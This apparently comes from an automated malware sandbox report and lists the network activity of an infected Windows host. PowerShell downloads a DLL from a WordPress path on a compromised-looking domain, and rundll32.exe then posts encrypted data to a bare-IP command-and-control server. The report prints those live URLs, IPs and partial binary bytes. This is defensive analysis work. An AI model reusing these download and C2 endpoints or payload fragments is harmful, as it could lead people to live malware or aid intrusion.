                      Jan 12, 2021 20:31:05.587775946 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587795019 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587835073 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587857962 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587873936 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587914944 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587941885 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587950945 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588001013 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588016033 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588043928 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588083982 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588107109 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588124037 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588161945 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588192940 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588200092 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588239908 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588269949 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588279963 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588329077 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588346004 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588372946 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588411093 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588442087 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588452101 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588490963 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588516951 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588529110 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588570118 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588591099 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588608980 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588659048 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588675976 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588702917 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588742018 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588763952 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588782072 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588821888 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588856936 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588869095 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588907957 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588942051 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588947058 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588985920 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589009047 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589024067 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589063883 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589087009 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589111090 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589154005 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589174032 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589193106 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589232922 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589260101 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589271069 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589309931 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589334965 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589349031 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589410067 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589413881 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589472055 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589519024 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589535952 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589562893 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589601040 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589627028 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589638948 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589679956 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589703083 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589715958 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589754105 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589781046 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589792967 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589840889 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589858055 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589885950 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589912891 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589951992 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.795813084 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.896431923 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:20.789009094 CET4916880192.168.2.2271.72.196.159
                      Jan 12, 2021 20:31:23.784401894 CET4916880192.168.2.2271.72.196.159
                      Jan 12, 2021 20:31:34.441170931 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:34.825376034 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:34.825609922 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:34.827358961 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:34.827480078 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:35.194834948 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:35.195111990 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:35.552457094 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:35.552515984 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.310410976 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.310657978 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:37.311260939 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.311352968 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:37.597510099 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.597558022 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.597882032 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:32:42.344824076 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:32:42.344913006 CET4916980192.168.2.2269.49.88.46

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 12, 2021 20:31:04.424675941 CET5219753192.168.2.228.8.8.8
                      Jan 12, 2021 20:31:04.484715939 CET53521978.8.8.8192.168.2.22
                      Jan 12, 2021 20:31:05.009018898 CET5309953192.168.2.228.8.8.8
                      Jan 12, 2021 20:31:05.065613985 CET53530998.8.8.8192.168.2.22

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Jan 12, 2021 20:31:04.424675941 CET192.168.2.228.8.8.80x71ddStandard query (0)remediis.comA (IP address)IN (0x0001)
                      Jan 12, 2021 20:31:05.009018898 CET192.168.2.228.8.8.80x8b68Standard query (0)avadnansahin.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Jan 12, 2021 20:31:04.484715939 CET8.8.8.8192.168.2.220x71ddNo error (0)remediis.com5.2.81.171A (IP address)IN (0x0001)
                      Jan 12, 2021 20:31:05.065613985 CET8.8.8.8192.168.2.220x8b68No error (0)avadnansahin.com109.232.216.177A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • avadnansahin.com
                      • 69.49.88.46

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.2249167109.232.216.17780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampkBytes transferredDirectionData
                      Jan 12, 2021 20:31:05.140002012 CET3OUTGET /wp-includes/w/ HTTP/1.1
                      Host: avadnansahin.com
                      Connection: Keep-Alive
                      Jan 12, 2021 20:31:05.219491005 CET4INHTTP/1.1 200 OK
                      Connection: Keep-Alive
                      X-Powered-By: PHP/7.0.33
                      Set-Cookie: 5ffdf8f92dc15=1610479865; expires=Tue, 12-Jan-2021 19:32:05 GMT; Max-Age=60; path=/
                      Cache-Control: no-cache, must-revalidate
                      Pragma: no-cache
                      Last-Modified: Tue, 12 Jan 2021 19:31:05 GMT
                      Expires: Tue, 12 Jan 2021 19:31:05 GMT
                      Content-Type: application/octet-stream
                      Content-Disposition: attachment; filename="Rq7pzbnT415DFc.dll"
                      Content-Transfer-Encoding: binary
                      Transfer-Encoding: chunked
                      Date: Tue, 12 Jan 2021 19:31:05 GMT
                      Data Raw: 31 30 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5a de fd 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 46 00 00 00 d4 04 00 00 00 00 00 f0 21 00 00 00 10 00 00 00 60 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 01 09 06 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 70 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 58 15 00 00 00 50 05 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 72 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8b 43 00 00 00 10 00 00 00 44 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0c 01 00 00 00 60 00 00 00 02 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 08 00 00 00 70 00 00 00 0a 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 a4 bf 04 00 00 80 00 00 00 c0 04 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 64 00 00 00 00 40 05 00 00 02 00 00 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 d4 07 00 00 00 50 05 00 00 08 00 00 00 16 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: 10000MZ@!L!This program cannot be run in DOS mode.$PELZ_!2F!``pdXPxr.textCD `.rdata`H@@.datapJ@.text4T@.text5d@ @.relocP@B
                      Jan 12, 2021 20:31:05.219544888 CET5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: UQPxEeXlxPDxP
                      Jan 12, 2021 20:31:05.219584942 CET7INData Raw: 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10
                      Data Ascii: jxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsj
                      Jan 12, 2021 20:31:05.219623089 CET8INData Raw: 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00
                      Data Ascii: jxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsj
                      Jan 12, 2021 20:31:05.219661951 CET9INData Raw: ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15 78 73 00 10 6a 00 ff 15
                      Data Ascii: xsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjxsjx
                      Jan 12, 2021 20:31:05.219698906 CET11INData Raw: 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c
                      Data Ascii: ErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErE
                      Jan 12, 2021 20:31:05.219739914 CET12INData Raw: 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72
                      Data Ascii: ErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErEr
                      Jan 12, 2021 20:31:05.219779015 CET14INData Raw: c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14
                      Data Ascii: ErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErEr
                      Jan 12, 2021 20:31:05.219829082 CET15INData Raw: 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00
                      Data Ascii: ErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErEr
                      Jan 12, 2021 20:31:05.219876051 CET16INData Raw: 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00
                      Data Ascii: rErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErEr
                      Jan 12, 2021 20:31:05.292373896 CET18INData Raw: 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7 45 8c 72 14 00 00 c7
                      Data Ascii: rErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErErEr


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.224916969.49.88.4680C:\Windows\SysWOW64\rundll32.exe
                      TimestampkBytes transferredDirectionData
                      Jan 12, 2021 20:31:34.827358961 CET358OUTPOST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1
                      DNT: 0
                      Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/
                      Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 69.49.88.46
                      Content-Length: 5492
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Jan 12, 2021 20:31:34.827480078 CET359OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 48 5a 74 76 73 62 34 69 71 61 68 39 74 6e 79 57 33 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
                      Data Ascii: ---------------------HZtvsb4iqah9tnyW329Content-Disposition: form-data; name="wMYeXmRD"; filename="ARXXDqGQvubEyU"Content-Type: application/octet-stream+iZ}fVRv%Yy9MJH< n-1rGF=[{]K]MSBq
                      Jan 12, 2021 20:31:35.195111990 CET363OUTData Raw: 7a de b4 de b4 b0 0d b4 56 41 04 3b cb 86 61 8f 69 46 9f ee 29 0d 8b 7a c4 39 1c 89 86 d7 ad ff 67 03 12 b9 4c 63 be f1 2c c7 5b 24 08 f3 2a 3f 5b 1d ba e8 35 3a e7 7b 6d d1 9d 3e 10 0b 5a 0f 84 f1 27 78 42 fe f7 dc ca 1a 70 f2 4e 16 c8 0f c5 23
                      Data Ascii: zVA;aiF)z9gLc,[$*?[5:{m>Z'xBpN#jMg|V&$VoC&/1>d)~(/h':&MW_bm87NMDeCf;l:[l?w?9j,F5#p---------------------
                      Jan 12, 2021 20:31:37.310410976 CET365INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 12 Jan 2021 19:31:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Vary: Accept-Encoding
                      Data Raw: 66 30 34 0d 0a 5c b4 e8 0a df c8 fc 15 5f 14 03 90 17 91 42 95 bb 60 9b 10 9a 31 8d f3 aa e5 ca 57 d1 60 dc 2a 41 15 f0 08 8c 83 69 a7 3e 6e 91 b1 28 72 e9 02 0f d2 29 ab dc 4e e4 d8 82 38 74 3c b7 d7 70 98 a0 07 f2 2a e1 a8 15 da d3 60 74 37 51 a7 33 46 fb 40 f6 9d 64 40 be 1d 2a 15 09 7e 09 d0 1d 3c 49 e9 08 d7 30 aa 4b fb 05 91 50 2b d7 39 13 2a 6d 3c f5 e4 bd 5c 37 20 7d a6 2e b0 32 8d ec 9b e0 17 e8 8f b6 02 1b 91 9a 06 5b a8 35 10 4d db b4 8c 1d 85 7a 70 9a 1e fb b3 9b 01 80 2a 15 4f 86 81 0f 9a 03 8e 86 62 9b ba 01 61 eb a6 b2 7d a9 7b 65 4b e5 d5 28 ee 2a 77 71 59 7e d9 b8 ef a3 b7 93 25 49 cc b8 76 8d 68 41 4e 7e 19 45 99 14 c0 e5 b1 ef d4 24 5b a4 6d 8e c4 f2 ac 70 28 3d 60 1b 6a 87 dd ca c3 fa 6d 58 4b ba 20 a3 51 19 f1 ea e9 00 54 52 62 a8 de a7 fd d2 a4 f7 a6 b3 2c 55 cb 25 8d 8b 94 58 ff c3 bb f2 af 34 8b 7f 1f 1c 1e 32 14 48 93 36 bc b5 78 ab a5 46 33 2f 34 8d c0 cd 2a eb 75 b0 d9 7b 8d 34 21 c0 20 84 0a 0b f8 9f c3 35 d8 a8 ef 4c 21 9d dd 3e dc 59 91 7a b3 8c f1 85 aa 2f 0c d8 62 a4 13 1d ed 7b f9 d9 8d 53 3a a6 3e 5c 4a e1 3a 00 62 19 b7 8a 3c 2d 43 aa ba 94 4f 74 23 00 7f 39 2b dc 08 38 b5 8b 60 13 aa 85 fd 7c 75 fc ba 9b 0f 87 21 ca 99 7b 5f 31 ee 73 68 01 87 a9 9f 9b a0 79 ef 78 b0 8f 66 a3 f7 d1 02 39 52 2f f1 09 2c 52 56 58 b3 b5 a4 d7 f2 89 1d e2 6e 2e c2 4d 96 7b fa 37 99 c7 7c 36 e2 24 f7 0b 77 62 69 be 7f d1 cf 5a 22 60 39 11 7e 2a fc 94 25 9c 3f 79 15 50 2a 34 6c a0 15 d6 8c 8f 53 21 eb 67 2d b1 ee d8 43 30 f1 bb cb 7c d6 cd 1e 75 2b 45 bf d4 2b 88 c1 7f 77 4f 23 fe 8b 63 24 62 2b d9 87 f9 9a fd 9c 5c b7 45 47 72 19 d7 40 4a 78 66 3b 5b 6e e7 96 4a c2 48 24 15 ff e7 99 e9 07 5a 1e 8d 85 e7 ee 0a 83 46 93 63 82 76 7a ff 20 4c 6b 0a b6 1f 40 af 92 7d 49 7c a5 00 15 f6 3a 21 14 95 44 0e a9 e4 1d f3 69 1e 88 f4 f9 2d 7c 4f 3f 2e a3 a9 d1 80 08 11 3d 75 b3 dd 32 9f 91 02 62 66 34 25 74 ec a3 d9 d9 70 46 54 11 63 76 42 da cc 5d 85 22 60 e9 27 1f cc 02 c9 e7 fc 51 a4 1d 1e e3 9f 0c 3b ec 7c ed 81 8f 48 63 13 ce 0f d5 2e 54 d7 fd 43 0d 81 b7 70 ab 2c b1 57 57 c4 26 e8 33 f0 25 fa 01 1e 47 28 bd cb ab 6d 8c e2 7e b2 dd ae 4e 20 22 6e af 53 0c 53 28 ea 98 d9 e0 e4 7b 70 c4 d1 db ad 5d 0c 16 40 dc 43 e5 bf b4 e2 db 78 a2 a9 ad ae 0f 3b af 8f 66 e1 b3 34 97 41 7d b1 45 0f 33 ef 53 1f 27 b5 06 10 b6 a5 2f 24 e9 27 89 14 8b 48 69 0e 69 66 f8 ee 9e de 5d a3 ca 7a f6 77 57 4b 59 96 5c 8c 99 8b 18 e8 de 20 6f 8b 1f 30 c0 29 8f 2e ee c1 cb d8 1b 1d 73 b7 78 a6 1a 0c 28 c6 8a 82 09 01 0e e0 d2 8f a1 78 8c d2 f4 f6 b9 18 58 d7 94 d2 00 2d b4 ea 85 60 20 c9 dc 37 c2 a8 a7 b4 5e b5 06 08 8f 69 dc 9b b6 1f 3b 02 31 c2 21 26 eb 69 6a 09 ec 89 06 73 49 16 83 63 78 bb 4a d7 1a 01 4b a8 02 d1 61 55 92 3f 30 52 f9 91 e5 3d fc 91 b4 f0 32 e2 90 86 d8 94 f6 db e0 ae 9e 12 a3 87 17 99 ab 97 8b a5 5a de 5b 4c 32 39 58 94 ef 1b 71 02 74 c6 9f f5 56 8a 10 e6 4e b1 b7 43 49 b2 1a 79 6b 22 37 8a c0 85 00 2b 7f 52 f5 de dd ac a5 90 3d 2a 1d f5 59 a7 2c 7e ee a9 11 7f 05 82 81 ce 5d fd 09 06 f5 e4 fb f0 1c 13 d5 d2 64 94 c1 f1 85 ec 84 11 ce 22 52 82 15 2d b4 a2 f1 0f d4 b0 08 b3 c2 f9 83 39 a1 2b 05 44 db 95 53 16 9d f5 62 1d e0 bb 89 97 a4 f5 32 99 27 ca 0b 22 03 3a b1 df 8b a2 ca a7 1e 77 6c 5b 36 bd 12 42 19 ff 20 86 5d 8b 0b 04 c6 af 05 ca cf 46 5d dc e3 c9 f2 f6 fa 05 2d 88 87 bf 2a 65 28 ce 9b 59 e3 06 c2 df 82 1b ac 8d 8b 64 1d b2 23 6e 43 07 31 82 62 a4 e2 7b 52 da 25 48 2f 12 2b 06 79 20 ee cd 6b 1a 43 f7 b7 17 5e 48 f9 35 bf 34 85 46 f3 8e 01 53 7e c1 00 d6 bc f8 f7 92 c7 af 8e 73 64 7b 63 1e
                      Data Ascii: f04\_B`1W`*Ai>n(r)N8t<p*`t7Q3F@d@*~<I0KP+9*m<\7 }.2[5Mzp*Oba}{eK(*wqY~%IvhAN~E$[mp(=`jmXK QTRb,U%X42H6xF3/4*u{4! 5L!>Yz/b{S:>\J:b<-COt#9+8`|u!{_1shyxf9R/,RVXn.M{7|6$wbiZ"`9~*%?yP*4lS!g-C0|u+E+wO#c$b+\EGr@Jxf;[nJH$ZFcvz Lk@}I|:!Di-|O?.=u2bf4%tpFTcvB]"`'Q;|Hc.TCp,WW&3%G(m~N "nSS({p]@Cx;f4A}E3S'/$'Hiif]zwWKY\ o0).sx(xX-` 7^i;1!&ijsIcxJKaU?0R=2Z[L29XqtVNCIyk"7+R=*Y,~]d"R-9+DSb2'":wl[6B ]F]-*e(Yd#nC1b{R%H/+y kC^H54FS~sd{c
                      Jan 12, 2021 20:31:37.311260939 CET366INData Raw: f1 69 14 93 ba 87 cb eb 9c 0c 63 21 c5 31 6b 9a 3f 81 1a c0 e7 4d 14 6e e3 c1 fb 6e b5 ef 3b 3a 1b 2b 46 10 35 d3 19 6b b5 23 c4 e5 d5 a1 3c 9d d2 84 18 49 4b 3c 3f 6d 5f 80 34 f7 b2 4c 29 5b dd aa 7f 79 37 b3 db f8 a8 0a b0 f7 77 fa 4a 5e ff 46
                      Data Ascii: ic!1k?Mnn;:+F5k#<IK<?m_4L)[y7wJ^FzxKA,Ui@.?H WL~PM&YN$7]7U|A9Pz*`@jzI8!ZSV>mZS}^6d,[]M+dR{]bL9YJ\;2
